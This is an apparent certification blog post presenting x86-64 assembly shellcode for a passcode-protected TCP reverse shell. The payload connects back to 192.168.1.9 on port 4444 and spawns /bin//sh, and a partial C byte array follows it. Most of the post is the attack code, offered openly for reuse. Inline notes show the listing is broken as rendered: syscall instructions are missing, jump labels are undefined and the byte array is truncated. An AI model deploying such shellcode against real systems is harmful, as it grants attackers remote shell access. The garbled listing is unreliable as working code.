domingo, 25 de mayo de 2014

[SLAEx64] II tcp_reverse_shell with passcode

Source: SecurityTube

This is an x64 TCP reverse shell with a passcode. If you need more explanation, please check my post about the x32 reverse shell, where you can find the man pages about *nix socket programming.

shell asm source

; Author Andriy Brukhovetskyy - doomedraven - SLAEx64 - 1322
; 138 bytes
global _start
section .text

; NOTE(review): NASM syntax, Linux x86-64 syscall ABI (numbers: socket 41,
; connect 42, dup2 33, read 0, exit 60, execve 59). As rendered on this page
; the listing is incomplete: `_start` is declared global but no `_start:` label
; appears, `dup2_loop` and `accepted_passwd` are jump targets that are never
; defined, and no `syscall` instruction is present although syscall numbers
; are loaded into rax throughout. The text as shown does not assemble, and the
; "138 bytes" figure cannot be checked against it; the comments below describe
; the author's intended flow as far as the visible lines support it.
;
; Detection/IR notes: the connect-back destination is a constant in the
; sockaddr_in built below (bytes c0 a8 01 09 / 11 5c, matching the C output
; later on this page: 192.168.1.9, TCP port 4444); the 8-byte passcode and
; the "/bin//sh" string are immediates. Flow: socket -> connect -> dup2 x3 ->
; read -> 8-byte compare -> execve on match, exit otherwise.

    ;socket syscall: socket(AF_INET, SOCK_STREAM, 0); rax = 0x29 (41)
    push byte 0x29 ; 41 socket 
    pop rax    
    push byte 0x2 ; AF_INET
    pop rdi  
    push byte 0x1 ; SOCK_STREAM
    pop rsi    
    cdq ;rdx = 0 - ANY (eax = 0x29 is non-negative, so cdq zeroes edx and thus rdx: protocol 0)
    xchg rdi, rax ; save socket descriptor
                  ; NOTE(review): the `syscall` that would leave the descriptor in
                  ; rax is not shown above; as rendered rax still holds 0x29 here.

    ; Build a struct sockaddr_in below rsp, then move rsp onto it:
    ;   [rsp-8] sin_family = AF_INET (2)
    ;   [rsp-6] sin_port   = bytes 11 5c in memory = htons(4444)
    ;   [rsp-4] sin_addr   = bytes c0 a8 01 09 in memory = 192.168.1.9
    ; Offsets 8..15 (sin_zero) are never written and hold whatever was already
    ; at [rsp]; presumably the author relies on connect() not reading them.
    mov dword [rsp-4], 0x0901a8c0 ; ip   (192.168.1.9 in network byte order)
    mov word [rsp-6], 0x5c11      ; port 4444 (network byte order)
    mov byte [rsp-8], 0x02        ; sin_family = AF_INET
    sub rsp, 8                    ; rsp now points at the structure
    ;connect syscall: connect(sockfd, &sockaddr, 16); rax = 0x2a (42), sockfd still in rdi
    push byte 0x2a ; connect
    pop rax
    mov rsi, rsp   ; pointer to the sockaddr_in (the push/pop above net to zero)
    push byte 0x10 ; len = sizeof(struct sockaddr_in) = 16
    pop rdx
    ; (no `syscall` follows in this rendering)

    ; dup2 loop, intended as dup2(sockfd, 2), dup2(sockfd, 1), dup2(sockfd, 0):
    ; stderr, stdout and stdin are redirected to the socket. rsi is the counter;
    ; the `dup2_loop` target of the jnz below is not defined in this rendering.
    push byte 0x3; counter 
    pop rsi

    dec rsi        ; rsi = fd to replace on this pass (2, 1, 0); ZF set on the last pass
    push byte 0x21 ; dup2 (33) -- push/pop leave the flags untouched
    pop rax
    jnz dup2_loop ; jump if not 0 (ZF from `dec rsi` above)

    ;read buffer: intended as read(fd, buf, count) with the passcode expected in
    ; the first 8 bytes of buf
    mov rdi, rax ; socket -- NOTE(review): author's comment; the value of rax here
                 ; depends on the dup2 syscall that does not appear in this
                 ; rendering (presumably 0, i.e. stdin now bound to the socket)
    mov byte [rsp-1], al ;0 read (author: al is expected to be 0 = read's syscall number)
    sub rsp, 1
    push rdx 
    lea rsi, [rsp-0x10] ; 16 bytes from buf -> buf starts 16 bytes below rsp
    add dl, 0x10        ; size_t count (rdx += 16)
    ;test passcode: fixed 8-byte equality against the first qword of buf
    mov rax, 0x617264656d6f6f64 ; passcode 'doomedra'[::-1].encode('hex')
                                ; (little-endian encoding of the ASCII string "doomedra")
    push rdi                    ; save the socket
    lea rdi, [rsi]              ; load string from address (rdi = buf)
    scasq                       ; compare rax with qword [rdi]; sets ZF, advances rdi by 8
    jz accepted_passwd          ; jump if equal (label not defined in this rendering)
    ; Only the first 8 received bytes take part in the check; anything after is ignored.
    ;exit if different :P -> exit (60); no `syscall` follows in this rendering
    push byte 0x3c 
    pop rax

    ; accepted_passwd path (label missing in this rendering):
    ; set up execve("/bin//sh", {"/bin//sh", NULL}, NULL) on the stack
    pop rdi; socket (restores the value saved by `push rdi` above)
    xor rax, rax      ; rax = 0; also the NULL qword pushed below
    mov rbx, 0x68732f2f6e69622f ;/bin//sh in reverse (little-endian "/bin//sh")
    push rbx          ; filename string on the stack
    mov rdi, rsp      ; rdi = filename
    push rax          ; NULL
    mov rdx, rsp      ; rdx = envp -> {NULL}
    push rdi 
    mov rsi, rsp      ; rsi = argv -> {filename, NULL}
    add al, 0x3b      ; rax = 0x3b (59) execve; no `syscall` follows in this rendering

C output

// 138 bytes 
// NOTE(review): only the first two string fragments of the byte array survive
// in this rendering (the initializer is neither closed nor terminated), so the
// 138-byte count cannot be verified here. The two fragments shown are the
// sin_addr and sin_port fields of the sockaddr_in from the assembly above, in
// network byte order: 192.168.1.9 and TCP port 4444 -- the connect-back
// destination, and the most useful static indicator in this payload.
unsigned char code[] =\
"\xc0\xa8\x01\x09" //ip, big-endian (network byte order): 192.168.1.9
"\x11\x5c" //port, big-endian (network byte order): 0x115c = 4444


Correct passwd

Incorrect passwd

This shellcode was accepted to and can be found here; special thanks to @JonathanSalwan for accepting it :)

SLAE64 - 1322

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

SecurityTube Linux Assembly Expert x64
